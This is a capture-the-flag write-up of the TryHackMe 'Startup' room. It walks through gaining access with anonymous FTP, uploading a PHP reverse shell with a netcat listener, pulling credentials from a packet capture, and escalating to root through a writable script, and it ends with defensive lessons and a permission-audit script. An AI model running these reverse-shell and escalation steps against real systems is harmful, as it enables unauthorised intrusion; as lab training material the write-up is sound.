Challenges: Startup (TryHackMe)


Welcome to Spice Hut, a quirky startup that sells spices and sandwiches—but more importantly, has questionable security practices. As part of a penetration testing engagement, our goal was to assess their infrastructure and attempt full system compromise. From initial enumeration to gaining root access, this box tested a wide range of fundamental skills, including service enumeration, steganography, reverse shells, PCAP analysis, and privilege escalation via weak scripting logic.
This write-up summarizes the full exploit chain used during the engagement, the vulnerabilities discovered, and key lessons learned throughout the process.
Welcome to Spice Hut!
We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!
Answer the questions below
What is the secret spicy soup recipe?
nmap -sC -sV IP_Address
ftp IP_Address
Anonymous
get notice.txt
get important.jpg
cat notice.txt
Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus
sudo pip3 install capstone==4.0.2
binwalk -e important.jpg
The image is sort of a meme.
We're going to copy a PHP reverse shell file, upload it over FTP, and then use it to get initial user access:
cp /usr/share/webshells/php/php-reverse-shell.php shell.php
nano shell.php
Edit the IP address and port in the file.
Log back in to FTP, then upload the file:
ftp IP_Address
put shell.php
nc -lvnp 4444
Go to http://IP_Address/files/ftp/ and click on the shell.php file.
The reverse shell connects back to the listener.
Switch to a fully interactive TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
We found a recipe.txt file that reveals the recipe.
What are the contents of user.txt?
Back on FTP, there's an ftp folder that we had missed. Checking the folder, it has a pcapng file that will help us move on in this step:
ftp IP_Address
get suspicious.pcapng
Open the pcapng file using Wireshark.
Select a packet with the TCP protocol, click Analyze, then Follow, then TCP Stream. Keep changing the stream number until stream 7 and look through it.
We have a user called lennie and a password, so we can use ssh to access the user flag:
ssh lennie@IP_Address
find / -type f -name user.txt 2> /dev/null
What are the contents of root.txt?
cd scripts/
cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
ls -lah /etc/print.sh
/etc$ chmod +x print.sh
/$ /tmp/rootbash -p
# find / -type f -name root.txt 2> /dev/null
Credits
Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!
Find my official writeup here: https://www.youtube.com/watch?v=3qNxI1OggGc
I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.
I'd like to thank my testers Amit25095, BarZigmon and powershot.
Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.
And of course, I'd like to thank you for playing. Hope to see you soon!
This box was an excellent showcase of practical penetration testing skills. From basic enumeration and file analysis to privilege escalation via insecure script execution, Spice Hut reinforces the importance of:
Disabling anonymous FTP access in production environments.
Avoiding hardcoded or plaintext credentials.
Reviewing file and directory permissions, especially scripts run by privileged users.
Analyzing network captures for leaked sensitive information.
While the memes and quirky dialogue made the journey fun, the security flaws were very real—and could easily be exploited in a real-world scenario. Spice Hut has since taken your advice seriously, and with your help, they’ve now hired a proper security team. 🍜
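For the lesson about reviewing permissions on scripts run by privileged users, here is an added audit helper (not part of the original write-up or the room) that lists the files a script calls by absolute path, as planner.sh calls /etc/print.sh, and flags any that someone other than root could modify. The function names audit_script and called_paths and the TRUSTED_UID parameter are hypothetical.

```shell
#!/bin/sh
# Added example: audit a script that runs with root privileges.
# audit_script SCRIPT [TRUSTED_UID]
#   Lists the script itself and every file it executes by absolute path
#   that is not owned by TRUSTED_UID (default 0, root) or that is writable
#   by group or others. Returns 1 if anything was flagged, 0 otherwise.
# Scope (assumption): only a command at the start of a line, or the argument
# of ". / source / sh / bash", is considered; variables are not expanded and
# the permissions of parent directories are not checked.

called_paths() {
    awk '
        /^[ \t]*#/ { next }                    # skip comments and the shebang
        $1 ~ /^\// { print $1; next }          # e.g. /etc/print.sh
        ($1 == "." || $1 == "source" || $1 == "sh" || $1 == "bash") &&
            $2 ~ /^\// { print $2 }            # e.g. bash /opt/helper.sh
    ' "$1" | sort -u
}

audit_script() {
    script=$1
    trusted_uid=${2:-0}
    flagged=0
    for f in "$script" $(called_paths "$script"); do
        [ -e "$f" ] || continue
        # find prints the path only when the owner or the mode is unsafe;
        # -H resolves a symlink given on the command line to its target.
        hit=$(find -H "$f" -prune \
              \( ! -user "$trusted_uid" -o -perm -020 -o -perm -002 \) -print)
        if [ -n "$hit" ]; then
            ls -ld "$f"
            flagged=1
        fi
    done
    return "$flagged"
}
```

Run it as `audit_script /home/lennie/scripts/planner.sh` on the host; every line it prints is a file that should be owned by root and not writable by group or others.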
Written by

Jebitok